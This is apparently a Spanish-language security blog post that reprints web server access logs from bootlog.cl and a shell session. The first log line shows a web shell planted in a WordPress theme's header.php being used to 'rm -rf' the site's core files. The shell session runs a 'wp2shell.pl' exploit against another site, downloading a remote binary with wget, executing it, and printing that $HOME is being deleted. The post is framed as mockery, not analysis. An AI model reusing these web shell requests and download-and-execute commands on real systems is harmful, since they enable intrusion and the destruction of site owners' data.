210.22.83.146 - - [18/Oct/2008:04:50:15 -0400] "GET /wp-content/themes/classic/header.php?cmd=rm%20-rf%20../../../app.php%20../../../archives%20../../../error.html%20../../../favicon.ico%20../../../hola%20../../../i%20../../../license.txt%20../../../ok.html%20../../../old%20../../../panel%20../../../readme.html%20../../../sitemap.xml%20../../../sitemap.xml.gz%20../../../up%20../../../wp-admin%20../../../wp-atom.php%20../../../wp-blog-header.php%20../../../wp-comments-post.php%20../../../wp-commentsrss2.php%20../../../wp-config-sample.php%20../../../wp-config.php%20../../../wp-cron.php%20../../../wp-feed.php%20../../../wp-includes%20../../../wp-links-opml.php%20../../../wp-login.php%20../../../wp-mail.php%20../../../wp-pass.php%20../../../wp-rdf.php%20../../../wp-register.php%20../../../wp-rss.php%20../../../wp-rss2.php%20../../../wp-settings.php%20../../../wp-trackback.php%20../../../xmlrpc.php HTTP/1.1" 200 18 bootlog.cl "-" "Mozilla/4.8 [en] (Windows NT 6.0; U)" "-"
213.98.17.52 - - [18/Oct/2008:13:52:37 -0400] "GET /blog/linux/la-famosa-barrita-de-mac-en-ubuntu/ HTTP/1.1" 200 191 www.bootlog.cl "http://www.google.es/search?hl=es&client=firefox-a&rls=com.ubuntu%3Aes-ES%3Aunofficial&hs=XwF&q=problema+ubuntu++Please+update+the+panel+configuration+manually.&btnG=Buscar&meta=" "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.3) Gecko/2008101315 Ubuntu/8.10 (intrepid) Firefox/3.0.3" "-"
81.39.6.211 - - [18/Oct/2008:14:56:06 -0400] "GET /archives/2006/03/gnome_no_se_queda_atras.html HTTP/1.1" 200 191 www.bootlog.cl "http://www.google.co.uk/custom?hl=es&client=pub-2070091971271392&cof=FORID%3A1%3BGL%3A1%3BLBGC%3A336699%3BLC%3A%230000ff%3BVLC%3A%23663399%3BGFNT%3A%230000ff%3BGIMP%3A%230000ff%3BDIV%3A%23336699%3B&q=como+se+ponen+varios+escritorios+en+el+panel+de+gnome&btnG=Buscar" "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-"
190.21.85.239 - - [18/Oct/2008:19:20:46 -0400] "GET /panel HTTP/1.1" 200 191 www.bootlog.cl "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "-"
190.21.85.239 - - [18/Oct/2008:19:29:14 -0400] "GET /panel HTTP/1.1" 200 58 bootlog.cl "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-"
190.21.85.239 - - [18/Oct/2008:19:29:59 -0400] "GET /panel HTTP/1.1" 200 83 bootlog.cl "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-"
190.21.85.239 - - [18/Oct/2008:19:33:16 -0400] "GET /panel HTTP/1.1" 200 83 bootlog.cl "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-"
190.21.85.239 - - [18/Oct/2008:19:33:41 -0400] "GET /panel HTTP/1.1" 200 81 bootlog.cl "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-"

/* LOL Evidencia? WTF!!! */

[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "wget -O /tmp/done http://filefactory.com/?id=8383476 -o /dev/null"
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "chmod +x /tmp/done && /tmp/done && rm -rf /tmp/done"
Deleting $HOME ....................................................................
[b4rney@m4chine]$

Post Relacionado:

  1. Hack a Twitter Algo más embarazoso para Twitter fue rebelado por TechCrunch, la...

Tagged as: hackers, seguridad informatica

OPINA SOBRE ESTA NOTICIA

Previous post:

Next post: